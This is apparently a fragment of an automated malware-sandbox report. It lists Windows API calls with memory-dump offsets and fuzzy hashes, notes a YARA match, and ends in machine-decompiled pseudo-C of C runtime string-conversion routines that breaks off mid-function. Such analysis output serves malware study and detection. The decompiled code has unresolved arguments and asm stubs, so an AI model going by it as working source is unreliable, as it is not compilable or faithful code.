                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02547F5D
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: 7bb524445e5e85c7082fbbf4fe3202aab3eb179ec372b80d3d9a21b8bffee568
                • Instruction ID: ffedd9f37f9a35eec2834db4c79a4d859ce3fe0050e2a5c49cf4eeaf49eecf6b
                • Opcode Fuzzy Hash: 7bb524445e5e85c7082fbbf4fe3202aab3eb179ec372b80d3d9a21b8bffee568
                • Instruction Fuzzy Hash: 3D11AFB28047858FDB11CFA4D4483EEFFF4EB09314F44849AE895A7242C7789A46CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FindResource
                • String ID:
                • API String ID: 1635176832-0
                • Opcode ID: 3df545f459032f05f82f03ce3f77b6816ae03f6e200b67478aca7feb0449ef50
                • Instruction ID: 407907d87cbb6ff9fe390b1ec32cbc08c0ffb1da0b112ac5fc55b6e00c7f45a0
                • Opcode Fuzzy Hash: 3df545f459032f05f82f03ce3f77b6816ae03f6e200b67478aca7feb0449ef50
                • Instruction Fuzzy Hash: 3EF03C74A01304FBE7306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025496A9,00000800,00000000,00000000), ref: 025498BA
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 71b9f1ff39dee71ff922dec925787e67d4bdd4d9d5f2a780d45ab651d8fe951a
                • Instruction ID: a844993336a166d51b0b96e58040d92b18eef0726862f94aa35dd2f98cc231bc
                • Opcode Fuzzy Hash: 71b9f1ff39dee71ff922dec925787e67d4bdd4d9d5f2a780d45ab651d8fe951a
                • Instruction Fuzzy Hash: F011F2B69002498BDB10CF9AC444ADEFBF4AB88324F10842EE929B7600C774A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025496A9,00000800,00000000,00000000), ref: 025498BA
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 3d3832a687971835c21b6d913a19e6862dc8e07f0a480086cc01903049f0e669
                • Instruction ID: 88d545c3eb999d7abbaf84f44ac34972de38df340975bd65b99d499dee9c5da0
                • Opcode Fuzzy Hash: 3d3832a687971835c21b6d913a19e6862dc8e07f0a480086cc01903049f0e669
                • Instruction Fuzzy Hash: 3E1114B2D002498FDB10CF99D484ADEFBF4FB88314F14852EE529A7600C374A546CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 22f2ac132c78a3db0d2cddf0443dbf328cb84cf7446d82cd47d38204d8a3c6f5
                • Instruction ID: bbeff6b789171a48620854f0fa51d8058f24985a05341fdda140d112e703ac57
                • Opcode Fuzzy Hash: 22f2ac132c78a3db0d2cddf0443dbf328cb84cf7446d82cd47d38204d8a3c6f5
                • Instruction Fuzzy Hash: 3F1137B18042499FDB10CFA9C844BDEBFF8EB48310F14841AE565B7210C378A954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,022653E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 8430af38de514f94b246e1155ad379860ea6129d282e351939234fce200ddeb1
                • Instruction ID: 5ddcb02c7289a84e70e78e81d5f10a39cec092df8d58bd7b5b597a011b4498d7
                • Opcode Fuzzy Hash: 8430af38de514f94b246e1155ad379860ea6129d282e351939234fce200ddeb1
                • Instruction Fuzzy Hash: E91128B5800749DFDB10CF99C485BEEBBF8EB48314F10841AE955A3240D378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,022653E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 78ce894efe2848637c08a7d129589e8b8570a701decd990e7be84529e8afb9e0
                • Instruction ID: 691c8ba9b729459a604dc5cf42827305b4377f10bde3cc5b2225ae471d819742
                • Opcode Fuzzy Hash: 78ce894efe2848637c08a7d129589e8b8570a701decd990e7be84529e8afb9e0
                • Instruction Fuzzy Hash: D51136B5800749DFDB10DFA9C485BEEBBF8FB09314F14845AE558A3200D378AA46DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 2c28f64377d280cbeff455216b74d4f495cb31ae2e34898c38bf950ad18efc7c
                • Instruction ID: 80ef70b6fe58821caae05448bd083aa5a57586e1d95d24a96238dfc746622815
                • Opcode Fuzzy Hash: 2c28f64377d280cbeff455216b74d4f495cb31ae2e34898c38bf950ad18efc7c
                • Instruction Fuzzy Hash: 0111E3B59047499FDB20CF99C584BDEBBF8EB48314F108859E959A7600C3B4A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 81129fc976fb19df9197ee65c49d52103603e0440f2d57a4f8ab241fcbe538d9
                • Instruction ID: 573763dcd3564dc1c62839360748f28617fb3eb6768a708d24dde064d5fe5e50
                • Opcode Fuzzy Hash: 81129fc976fb19df9197ee65c49d52103603e0440f2d57a4f8ab241fcbe538d9
                • Instruction Fuzzy Hash: D311F5B58007499FDB10CF99C484BEEBBF8EB48314F108419E959A7600C3B4A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 6a7acbad578f022152978901495c4081a25ae3e1f7a8abc79a7e5a85ac573cbf
                • Instruction ID: 9d8bd237ea7d7a5be80dbbfa9b6b57fff1276f459f6225acae27c326724101bb
                • Opcode Fuzzy Hash: 6a7acbad578f022152978901495c4081a25ae3e1f7a8abc79a7e5a85ac573cbf
                • Instruction Fuzzy Hash: 051106B58007499FDB10CF99D584BDEBBF8EB48314F108459E919B7300C3B8A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0254962E
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 26fb27787fd8a1e6dbdd361a5282c92aef1459cce33bc2e9d4d06a5c6ac1b13e
                • Instruction ID: f06c75ef29c474ca62654b735c394db639229b210d2535299877a12457c4df3c
                • Opcode Fuzzy Hash: 26fb27787fd8a1e6dbdd361a5282c92aef1459cce33bc2e9d4d06a5c6ac1b13e
                • Instruction Fuzzy Hash: 0111E3B5D006898FCB10CF9AC445BDFFBF4AB88218F10855AD829A7600C774A546CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05396890
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 5df910815488a4d3e23923f44e67ffb2b2456b8e09040b5cb2dc71c4a8f29766
                • Instruction ID: 07f17b710702c3ea5a9bb50b1f5740acba4bd62af1c6ffd5346f7af2c75e30b0
                • Opcode Fuzzy Hash: 5df910815488a4d3e23923f44e67ffb2b2456b8e09040b5cb2dc71c4a8f29766
                • Instruction Fuzzy Hash: F51115B58047498FCB20CF99C485BDEBBF4EB48324F10842AD969A7340D778A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05396890
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 28434f7625e144b1e2e391fe145c0786527596ec6f187d1ac4a7bdd76dd5ce78
                • Instruction ID: 8ac816b79ff7be4f861e75fd706d7aa93921c6a9335be3c82993630b5809dbb4
                • Opcode Fuzzy Hash: 28434f7625e144b1e2e391fe145c0786527596ec6f187d1ac4a7bdd76dd5ce78
                • Instruction Fuzzy Hash: E31136B5C047498FCB10CF99C5857DEBBF4BB48320F14842AD969A7340D338A685CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: de9742e81c9a09e39f1a4e81e4c1aca8ac5df0360bf9a9bab6e281ab412b3c9f
                • Instruction ID: e93aba23d3fbf60ad878e19f90357318c4f04eb085e9dd9b502653d074b051c0
                • Opcode Fuzzy Hash: de9742e81c9a09e39f1a4e81e4c1aca8ac5df0360bf9a9bab6e281ab412b3c9f
                • Instruction Fuzzy Hash: 9811F2B58007899FDB10CF99D588BDEBBF8EB48310F10885AE969A7600C378A545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0254FE9D
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 7c8fa0c6e4bacd91be2b39fab396e0b5485b6d8cbbd217d75601a6d364d2ca08
                • Instruction ID: 0c4a1d6c7e17b6d94d94eeea52101524ebc461616a921d63eda2ef8cd72972f3
                • Opcode Fuzzy Hash: 7c8fa0c6e4bacd91be2b39fab396e0b5485b6d8cbbd217d75601a6d364d2ca08
                • Instruction Fuzzy Hash: 761133B58003498FDB10CF99C585BDEFBF8FB48314F20845AE869A7600C378A946CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 987da80552caa4e2eac10f4a6cd8e7489df960c17b56e2b734fa5cac0fe89ca9
                • Instruction ID: ebf746ed0cf68e9019e4b74e461b24b043c0b482185dffe11f4e7ae527ff1e46
                • Opcode Fuzzy Hash: 987da80552caa4e2eac10f4a6cd8e7489df960c17b56e2b734fa5cac0fe89ca9
                • Instruction Fuzzy Hash: 9311D3B59007499FDB10CF99C585BEEBBF8EB48314F10885AE559A7600C3B8AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 08d72b0e5a313a39dc8acb56b124a4bdcc1a6971ccfd3cee4dabb772bb32b204
                • Instruction ID: cea18f221c4a089235a4f7911e36c75c1db4257cd70102a88d7ede4885aa5d80
                • Opcode Fuzzy Hash: 08d72b0e5a313a39dc8acb56b124a4bdcc1a6971ccfd3cee4dabb772bb32b204
                • Instruction Fuzzy Hash: 4A11F2B5C04A899FCB14CF9AE448BDEFBF4AB48314F10852AE569A3600C378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0254FE9D
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 7f961db8910366b734c990cc209ec2fe01ec4ece6c33128cbaa66eafd1b74d51
                • Instruction ID: b5257118056c4ebe0e1ccae5827ba3fd909c6a9341438e992af73c69d9f67dee
                • Opcode Fuzzy Hash: 7f961db8910366b734c990cc209ec2fe01ec4ece6c33128cbaa66eafd1b74d51
                • Instruction Fuzzy Hash: 221100B59006498FDB10CF99D488BDEFBF8EB48324F10845AE929A7700C374A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: c093ebeedce1259ddcaa8af98cd09254c5e3baeaf2c8096b9d7019b754d3f12b
                • Instruction ID: 181934a17ca6c84b46343718f7989625c4775e8d85cb8b83eb614b8e607772f2
                • Opcode Fuzzy Hash: c093ebeedce1259ddcaa8af98cd09254c5e3baeaf2c8096b9d7019b754d3f12b
                • Instruction Fuzzy Hash: 4F11E2B58047898FDB10CF99D585BDEBBF8FB48314F10885AE569A7700C378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 6246c005e75ef8f0976824e8dd41b26eb829bc314e381e343c983e6a09da465a
                • Instruction ID: 66ee544cfe1b9a1d026607f4b366352c6b6f30ae487c6fefa61cb683cfab8c2b
                • Opcode Fuzzy Hash: 6246c005e75ef8f0976824e8dd41b26eb829bc314e381e343c983e6a09da465a
                • Instruction Fuzzy Hash: B011D0B5D04A498FCB14CF9AD448BDEFBF8EB48314F10852AE969A7200D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5130d5457a864ceebbba44fd86442ed3d9b97f5344a383f70516c4e8ece92db9
                • Instruction ID: a180117194d347f3aafea24f52890ccd5e67e8a3a45a2fbe357bb5ad724154e4
                • Opcode Fuzzy Hash: 5130d5457a864ceebbba44fd86442ed3d9b97f5344a383f70516c4e8ece92db9
                • Instruction Fuzzy Hash: F92125B1548240DFDB04DF10E8C0B3ABF65FB88324F24C569EA194B206C336D856CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b01563a98cfe74db091e35823b65e3b5e9753be7f50ee8d477da8d204a6aabcf
                • Instruction ID: 43597dc6a17a520d62271b85b0f829ad2968cd3b4aa1d618fef780e06caa5b9f
                • Opcode Fuzzy Hash: b01563a98cfe74db091e35823b65e3b5e9753be7f50ee8d477da8d204a6aabcf
                • Instruction Fuzzy Hash: FD210770518244EFDB01DFD4D9C0B2ABBA5FB88314F24C56DE9094B28BC7B6D806CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 548c617ff451607e8d9650277cfbdd30fe4f1e324033f5467516ab46ce92efad
                • Instruction ID: 04ac7b4fffc3e4383963a790df5c35de99dabba4aafe1e823301f69a9cdc979e
                • Opcode Fuzzy Hash: 548c617ff451607e8d9650277cfbdd30fe4f1e324033f5467516ab46ce92efad
                • Instruction Fuzzy Hash: AE21F574618244EFDB14CFA4D8C0F26BB66FB84314F24C569E94E4B28BC376D806CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c63da472b792fbd78c8f9a3b0d2513d81ed0aa0eb8ee08c54c6b00efce95007
                • Instruction ID: 7f065a3a21c8b956635df593a030cfe2b117bddf3e9b69613fc25148204149f2
                • Opcode Fuzzy Hash: 0c63da472b792fbd78c8f9a3b0d2513d81ed0aa0eb8ee08c54c6b00efce95007
                • Instruction Fuzzy Hash: 10215E755093C09FCB12CF64D9D4B15BF72EB46314F28C5DAD8498B6A7C33A980ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: 887715668355cdc97c4251c215fbab4e1ac20b06e40e3b9d21e1ebfe605ddae6
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: EE1181B6544280DFCF15CF10E9C4B6ABF61FB84324F24C6A9D9094B656C336D45ACBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: ae80abf4f6696c81865897cae4ace3ba45fcf401c18ba1bdac8c53404d9c13e8
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: 2411DD75904280DFDB01CF94D5C0B15FBA1FB88314F24C6AED8494B69BC37AD80ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a34b47298352f33748e1c35f422b401995b0a6795fb68e901acfd94f7d919157
                • Instruction ID: c2cdeff4db811324d2322cdb8c6677730c649b2c1215fc259bb83fdd097ceded
                • Opcode Fuzzy Hash: a34b47298352f33748e1c35f422b401995b0a6795fb68e901acfd94f7d919157
                • Instruction Fuzzy Hash: 94012B70448384AED7508B25EC8477BBB8CEF41228F19C05AEF385B646C378D845C7B1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91113caf714a70543349a1a548af955ef42614e71ee786563d15dd83caff0f96
                • Instruction ID: 867a5131a6276ccc03480b9f79414113a30ef48b433d4923095b19668aeff6e6
                • Opcode Fuzzy Hash: 91113caf714a70543349a1a548af955ef42614e71ee786563d15dd83caff0f96
                • Instruction Fuzzy Hash: 55019E7100D3C05FD7128B259C94B62BFB8EF43224F1980DBD9988F2A3C3688849C772
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t49;
                				signed int _t54;
                				int _t56;
                				signed int _t58;
                				short* _t60;
                				signed int _t64;
                				short* _t68;
                				int _t76;
                				short* _t79;
                				signed int _t85;
                				signed int _t88;
                				void* _t93;
                				void* _t94;
                				int _t96;
                				short* _t99;
                				int _t101;
                				int _t103;
                				signed int _t104;
                				short* _t105;
                				void* _t108;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0x412014; // 0x230c200f
                				_v8 = _t49 ^ _t104;
                				_t101 = _a20;
                				if(_t101 > 0) {
                					_t76 = E004080DB(_a16, _t101);
                					_t108 = _t76 - _t101;
                					_t4 = _t76 + 1; // 0x1
                					_t101 = _t4;
                					if(_t108 >= 0) {
                						_t101 = _t76;
                					}
                				}
                				_t96 = _a32;
                				if(_t96 == 0) {
                					_t96 =  *( *_a4 + 8);
                					_a32 = _t96;
                				}
                				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					E004018CC();
                					return _t54;
                				} else {
                					_t93 = _t54 + _t54;
                					_t83 = _t93 + 8;
                					asm("sbb eax, eax");
                					if((_t93 + 0x00000008 & _t54) == 0) {
                						_t79 = 0;
                						__eflags = 0;
                						L14:
                						if(_t79 == 0) {
                							L36:
                							_t103 = 0;
                							L37:
                							E004063D5(_t79);
                							_t54 = _t103;
                							goto L38;
                						}
                						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                						_t119 = _t56;
                						if(_t56 == 0) {
                							goto L36;
                						}
                						_t98 = _v12;
                						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                						_t103 = _t58;
                						if(_t103 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t94 = _t103 + _t103;
                							_t85 = _t94 + 8;
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							__eflags = _t85 & _t58;
                							if((_t85 & _t58) == 0) {
                								_t99 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t99;
                								if(__eflags == 0) {
                									L35:
                									E004063D5(_t99);
                									goto L36;
                								}
                								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                								__eflags = _t60;
                								if(_t60 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                								__eflags = _t103;
                								if(_t103 != 0) {
                									E004063D5(_t99);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t88 = _t94 + 8;
                							__eflags = _t94 - _t88;
                							asm("sbb eax, eax");
                							_t64 = _t58 & _t88;
                							_t85 = _t94 + 8;
                							__eflags = _t64 - 0x400;
                							if(_t64 > 0x400) {
                								__eflags = _t94 - _t85;
                								asm("sbb eax, eax");
                								_t99 = E00403E3D(_t85, _t64 & _t85);
                								_pop(_t85);
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L35;
                								}
                								 *_t99 = 0xdddd;
                								L28:
                								_t99 =  &(_t99[4]);
                								goto L30;
                							}
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							E004018E0();
                							_t99 = _t105;
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L35;
                							}
                							 *_t99 = 0xcccc;
                							goto L28;
                						}
                						_t68 = _a28;
                						if(_t68 == 0) {
                							goto L37;
                						}
                						_t123 = _t103 - _t68;
                						if(_t103 > _t68) {
                							goto L36;
                						}
                						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                						if(_t103 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t70 = _t54 & _t93 + 0x00000008;
                					_t83 = _t93 + 8;
                					if((_t54 & _t93 + 0x00000008) > 0x400) {
                						__eflags = _t93 - _t83;
                						asm("sbb eax, eax");
                						_t79 = E00403E3D(_t83, _t70 & _t83);
                						_pop(_t83);
                						__eflags = _t79;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t79 = 0xdddd;
                						L12:
                						_t79 =  &(_t79[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E004018E0();
                					_t79 = _t105;
                					if(_t79 == 0) {
                						goto L36;
                					}
                					 *_t79 = 0xcccc;
                					goto L12;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                • String ID:
                • API String ID: 2597970681-0
                • Opcode ID: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				void* __ebx;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t93;
                				long _t96;
                				void _t104;
                				void* _t111;
                				signed int _t115;
                				signed int _t118;
                				signed char _t123;
                				signed char _t128;
                				intOrPtr _t129;
                				signed int _t131;
                				signed char* _t133;
                				intOrPtr* _t136;
                				signed int _t138;
                				void* _t139;
                
                				_t78 =  *0x412014; // 0x230c200f
                				_v8 = _t78 ^ _t138;
                				_t80 = _a8;
                				_t118 = _t80 >> 6;
                				_t115 = (_t80 & 0x0000003f) * 0x30;
                				_t133 = _a12;
                				_v52 = _t133;
                				_v48 = _t118;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                				_v40 = _a16 + _t133;
                				_t86 = GetConsoleCP();
                				_t136 = _a4;
                				_v60 = _t86;
                				 *_t136 = 0;
                				 *((intOrPtr*)(_t136 + 4)) = 0;
                				 *((intOrPtr*)(_t136 + 8)) = 0;
                				while(_t133 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t133;
                					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                					_t123 =  *(_t129 + _t115 + 0x2d);
                					if((_t123 & 0x00000004) == 0) {
